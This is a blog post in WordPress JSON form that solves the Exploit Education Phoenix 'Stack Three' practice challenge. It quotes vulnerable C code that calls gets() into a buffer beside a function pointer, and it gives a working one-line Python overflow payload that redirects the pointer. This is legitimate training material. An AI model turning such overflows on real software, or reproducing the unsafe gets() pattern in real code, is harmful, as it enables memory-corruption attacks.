{"id":438,"date":"2019-07-09T11:31:50","date_gmt":"2019-07-09T15:31:50","guid":{"rendered":"https:\/\/blog.lamarranet.com\/?p=438"},"modified":"2019-08-16T13:19:40","modified_gmt":"2019-08-16T17:19:40","slug":"exploit-education-phoenix-stack-three-solution","status":"publish","type":"post","link":"https:\/\/blog.lamarranet.com\/index.php\/exploit-education-phoenix-stack-three-solution\/","title":{"rendered":"Exploit Education | Phoenix | Stack Three Solution"},"content":{"rendered":"

Stack Three<\/h1>\n

The description and source code can be found here:
\nhttps:\/\/exploit.education\/phoenix\/stack-three\/<\/a><\/p>\n

This time we need to overwrite a function pointer that’s being stored on the stack. We need to get the program to call the complete_level()<\/span> function:<\/p>\n

void complete_level() {\r\n    printf("Congratulations, you've finished " LEVELNAME " :-) Well done!\\n");\r\n    exit(0);\r\n}<\/pre>\n
The program initializes the “fp<\/strong>” pointer variable to NULL, gets a string from user input, saves it to the “buffer<\/strong>” variable, and calls whatever is stored in “fp<\/strong>” as if it were a function:<\/p>\n
struct {\r\n    char buffer[64];\r\n    volatile int (*fp)();\r\n} locals;\r\n\r\nprintf("%s\\n", BANNER);\r\n\r\nlocals.fp = NULL;\r\ngets(locals.buffer);\r\n\r\nif (locals.fp) {\r\n    printf("calling function pointer @ %p\\n", locals.fp);\r\n    fflush(stdout);\r\n    locals.fp();\r\n    ...<\/pre>\n
We can use objdump<\/span> to get address of the complete_level()<\/span> function:<\/p>\n
user@phoenix-amd64:\/opt\/phoenix\/amd64$ objdump -d stack-three | grep complete_level\r\n000000000040069d <complete_level>:<\/pre>\n
So we should be able to put 0x40069d into the “fp” pointer to get that function to call:<\/p>\n
user@phoenix-amd64:\/opt\/phoenix\/amd64$ python -c 'print "A"*64 + "\\x9d\\x06\\x40"' | .\/stack-three\r\nWelcome to phoenix\/stack-three, brought to you by https:\/\/exploit.education\r\ncalling function pointer @ 0x40069d\r\nCongratulations, you've finished phoenix\/stack-three :-) Well done!<\/pre>\n","protected":false},"excerpt":{"rendered":"
Stack Three looks at overwriting function pointers stored on the stack … Continue readingExploit Education | Phoenix | Stack Three Solution<\/span><\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[5],"tags":[],"class_list":["post-438","post","type-post","status-publish","format-standard","hentry","category-solutions"],"_links":{"self":[{"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/posts\/438","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/comments?post=438"}],"version-history":[{"count":2,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/posts\/438\/revisions"}],"predecessor-version":[{"id":686,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/posts\/438\/revisions\/686"}],"wp:attachment":[{"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/media?parent=438"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/categories?post=438"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/tags?post=438"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}